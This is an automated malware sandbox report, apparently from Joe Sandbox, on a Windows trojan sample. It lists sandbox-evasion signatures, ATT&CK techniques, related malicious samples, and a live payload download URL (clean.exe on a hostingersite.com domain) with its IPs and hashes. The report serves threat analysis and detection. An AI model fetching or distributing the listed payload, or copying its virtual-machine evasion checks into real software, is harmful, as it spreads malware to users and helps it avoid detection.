Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeMemory allocated: 1EC7D200000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeMemory allocated: 1EC7EE00000 memory reserve | memory write watchJump to behavior
Source: Amcache.hve.4.drBinary or memory string: VMware
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: iGxCM2I5u9.exe, 00000000.00000002.2313961291.000001EC7D182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.4.drBinary or memory string: vmci.sys
Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.drBinary or memory string: VMware20,1
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeQueries volume information: C:\Users\user\Desktop\iGxCM2I5u9.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
11
Virtualization/Sandbox Evasion
OS Credential Dumping211
Security Software Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory11
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS12
System Information Discovery
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
iGxCM2I5u9.exe66%ReversingLabsByteCode-MSIL.Trojan.Zilla
iGxCM2I5u9.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://orange-loris-425181.hostingersite.com/uploads/clean.exepV0%Avira URL Cloudsafe
http://orange-loris-425181.hostingersite.com0%Avira URL Cloudsafe
https://orange-loris-425181.hostingersite.com0%Avira URL Cloudsafe
https://orange-loris-425181.hostingersite.com/uploads/clean.exe100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
free.cdn.hstgr.net
84.32.84.122
truefalse
    high
    orange-loris-425181.hostingersite.com
    unknown
    unknownfalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://orange-loris-425181.hostingersite.com/uploads/clean.exefalse
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://free.cdn.hstgr.netiGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000AE000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://crl.miGxCM2I5u9.exe, 00000000.00000002.2314680258.000001EC7ECA1000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://upx.sf.netAmcache.hve.4.drfalse
            high
            https://orange-loris-425181.hostingersite.com/uploads/clean.exepViGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00001000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssiGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000D4000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000CF000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://orange-loris-425181.hostingersite.comiGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000A8000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00098000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://orange-loris-425181.hostingersite.comiGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000AE000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameiGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00098000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                84.32.84.122
                free.cdn.hstgr.netLithuania
                33922NTT-LT-ASLTfalse
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1569093
                Start date and time:2024-12-05 13:04:07 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 17s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:iGxCM2I5u9.exe
                renamed because original name is a hash value
                Original Sample Name:2960e7ad1d18bf517b5b4edf6e674e5ffdc587a8672cac0b24907a8fae8de59c.exe
                Detection:MAL
                Classification:mal72.evad.winEXE@2/5@1/1
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 11
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 20.42.73.29
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target iGxCM2I5u9.exe, PID 6420 because it is empty
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • VT rate limit hit for: iGxCM2I5u9.exe
                TimeTypeDescription
                07:05:24API Interceptor1x Sleep call for process: WerFault.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                84.32.84.122Purchase_Order_PA056223.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • www.1stsole.com/oa21/?u6al_=niA2MlpkbxJ4Mq6wpnhlUOBAu/LmwJ6ICug6ywS8gbH4QnqQ5s3YCt8UK27E3//jN+UG&I8qdZf=ZN941p00dP
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                free.cdn.hstgr.netFmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                • 84.32.84.136
                https://ohpky5.fj78.fdske.com/e/c/01jbx9w45rt8n7dv9hga5bx34b/01jbx9w45rt8n7dv9hgd1yw31dGet hashmaliciousUnknownBrowse
                • 84.32.84.121
                http://zip.lu/?redirect=3k7wIGet hashmaliciousUnknownBrowse
                • 84.32.84.104
                https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/Get hashmaliciousUnknownBrowse
                • 84.32.84.197
                http://zip.lu/?redirect=3k7wIGet hashmaliciousUnknownBrowse
                • 84.32.84.227
                https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/Get hashmaliciousUnknownBrowse
                • 93.127.179.137
                e0OOofAl0S.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 191.96.144.157
                oZB7n3wuNk.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 84.32.84.152
                mLn7GEEpuS.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 185.77.97.68
                V6n3oygctH.exeGet hashmaliciousCryptOne, SmokeLoader, StealcBrowse
                • 84.32.84.249
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                NTT-LT-ASLTSRT68.exeGet hashmaliciousFormBookBrowse
                • 84.32.84.32
                http://editableslides.coGet hashmaliciousHTMLPhisher, TechSupportScamBrowse
                • 84.32.84.208
                Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                • 84.32.84.32
                SW_5724.exeGet hashmaliciousFormBookBrowse
                • 84.32.84.32
                attached invoice.exeGet hashmaliciousFormBookBrowse
                • 84.32.84.32
                loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                • 84.32.53.129
                attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • 84.32.84.32
                DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • 84.32.84.32
                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                • 84.32.51.16
                NfFibKKmiz.exeGet hashmaliciousUnknownBrowse
                • 84.32.131.125
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                3b5074b1b5d032e5620f69f9f700ff0e1AxSwjpyGp.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                • 84.32.84.122
                V5P3YggUcy.exeGet hashmaliciousLummaC StealerBrowse
                • 84.32.84.122
                FPBKcOFjEP.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                • 84.32.84.122
                V5P3YggUcy.exeGet hashmaliciousLummaC StealerBrowse
                • 84.32.84.122
                LiteDBViewer.exeGet hashmaliciousLummaC StealerBrowse
                • 84.32.84.122
                MerchantDetailedStatement_37063_04122024.exeGet hashmaliciousAgentTeslaBrowse
                • 84.32.84.122
                MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                • 84.32.84.122
                payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                • 84.32.84.122
                ky.ps1Get hashmaliciousUnknownBrowse
                • 84.32.84.122
                List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                • 84.32.84.122
                No context
                Process:C:\Windows\System32\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):1.2522039650068986
                Encrypted:false
                SSDEEP:192:jZTs2Z4024L57aWB+9lR1yiXzuiFjZ24lO8W:9Ts2d2k57amUjxXzuiFjY4lO8W
                MD5:4DA5BE2CE2344EDB153F0F6D1D0D6C22
                SHA1:1AC0616DD1933AF1B38308850A4FDA950F1CA375
                SHA-256:5FECED282237E2071B108D0BDF2382B31321F59C5CA7A7C434DD257005F240E3
                SHA-512:A3F2954DB6206ADA6DDD28815E980A9A08831287E9B4CE5CDCA97E52207D5C1AC48A71B4C16FCE55343675AFE3202F1D7C39FF51B40F89B952F043C81A27B138
                Malicious:true
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.7.3.8.9.9.1.8.3.6.4.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.7.3.8.9.9.8.2.4.2.6.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.9.5.4.6.a.9.-.f.e.2.e.-.4.d.e.8.-.b.1.7.3.-.2.2.0.6.5.3.5.a.8.c.0.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.5.a.5.4.6.f.-.7.2.0.2.-.4.e.a.f.-.a.0.c.b.-.3.c.1.7.b.f.2.b.b.c.4.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.i.G.x.C.M.2.I.5.u.9...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.y.s.t.e.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.1.4.-.0.0.0.1.-.0.0.1.4.-.7.6.1.2.-.2.4.e.6.0.d.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.e.e.2.e.3.a.e.3.8.a.9.b.c.0.f.4.1.b.6.8.2.d.f.6.4.c.6.a.d.1.7.0.0.0.0.0.0.0.0.!.0.0.0.0.3.5.2.4.2.2.8.0.f.5.5.1.6.8.4.b.9.e.4.7.7.2.6.d.5.f.9.4.f.1.6.1.5.c.0.d.c.7.6.e.!.i.G.x.C.M.2.I.5.u.9...e.x.
                Process:C:\Windows\System32\WerFault.exe
                File Type:Mini DuMP crash report, 16 streams, Thu Dec 5 12:04:59 2024, 0x1205a4 type
                Category:dropped
                Size (bytes):430988
                Entropy (8bit):3.1531423801095384
                Encrypted:false
                SSDEEP:3072:JRoBwJkKmrykK4BfcS3PQ6prUAz1CCq4Jr1gSotQx3+vyLR1:0BwiSo3o6phrq4Jr1gSo43QM
                MD5:2485EAFCC11A40F9A223C4F666A17F3E
                SHA1:5FBDF5D4EDB174E4CB2764A3C90C39314E5AF783
                SHA-256:F7DFAA4A046848BD72FE98891A774D3B37E9926EB658CACF7C901072AFE0A6D7
                SHA-512:A328F88C729321BE909115A0D6A66C0CC3CBA8399EA02B2B6E5AB6D41EFBAA2039DE6F658EE9D9538D715D7BA9B16B2CCE4D298B9AA739831C23D2900950B549
                Malicious:false
                Reputation:low
                Preview:MDMP..a..... ........Qg.........................!..........<....+......H....+......44.............l.......8...........T...........hR..$A...........:...........;..............................................................................eJ.......<......Lw......................T............Qg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\System32\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8760
                Entropy (8bit):3.6938725707604605
                Encrypted:false
                SSDEEP:192:R6l7wVeJjSOr6YEIsSGKfYgmfZ816BUpDB89bDUUf+HBm:R6lXJ2M6YEzSGKfYgmfe83DPf+c
                MD5:6E1E0917FFD17034DE94A8A99FF73ECD
                SHA1:10076817C8BDB45FAE93BD13254371C7C98BDC6F
                SHA-256:34CA25201E5BCFAD236DFEE0F082A7BEE9E8C9026E8F3A15735BB6246AE1F6EC
                SHA-512:EE21F2E09DEA07B60EB2D31ED1760FF83D2F8448A96C6D12AAF07EF1046A078824B5D5CFBC2D10830DEEA0027F6F55C93C9C375F48013742FF4F5BBC07059E3B
                Malicious:false
                Reputation:low
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.2.0.<./.P.i.
                Process:C:\Windows\System32\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4753
                Entropy (8bit):4.4484366382701115
                Encrypted:false
                SSDEEP:48:cvIwWl8zsZpuJg771I9p2WpW8VYg0Ym8M4JCqPFxIyq8vCq2CX7S7OHxwd:uIjfUI7+X7VrJOWjX7SiRwd
                MD5:CB8FE1D8D6CFD461DA0643C9B0C44ED6
                SHA1:74CEF4803913C6FA8D1C9F49E616483AA5732A09
                SHA-256:B183234130139091FBB1BA03E123C32DE26221A97B80F2790EF47FD878E21B58
                SHA-512:BD8DC3231E7F726E0FFB0929D414B33B4D45DEEEB89D98BBC21EC7BB0C24562D48AF523CE24D2831A601CC347EDEB7325EDEC1404E789EDB84295294F3006099
                Malicious:false
                Reputation:low
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="617947" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                Process:C:\Windows\System32\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):1835008
                Entropy (8bit):4.421608961424804
                Encrypted:false
                SSDEEP:6144:FSvfpi6ceLP/9skLmb0OTTWSPHaJG8nAgeMZMMhA2fX4WABlEnN50uhiTw:MvloTTW+EZMM6DFyT03w
                MD5:B7B2703DA8023004DD579810CEDDE0B1
                SHA1:64672B97E874776E0E72E764D605CD8DACF2CAFA
                SHA-256:9380D8185C3D896C85884C5862F21E18848F14454CE720515A0A8FB6C9AE25CB
                SHA-512:87EBBE570B8F9ACA2F2E3B88F4139C91EB237386A1F0CEE2A1E568028EB8CE5EB8F67C51C54066DCC7266487E81BAC063998DD25622F6ADD9A04028B1AEC6D64
                Malicious:false
                Reputation:low
                Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.|...G..............................................................................................................................................................................................................................................................................................................................................]...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
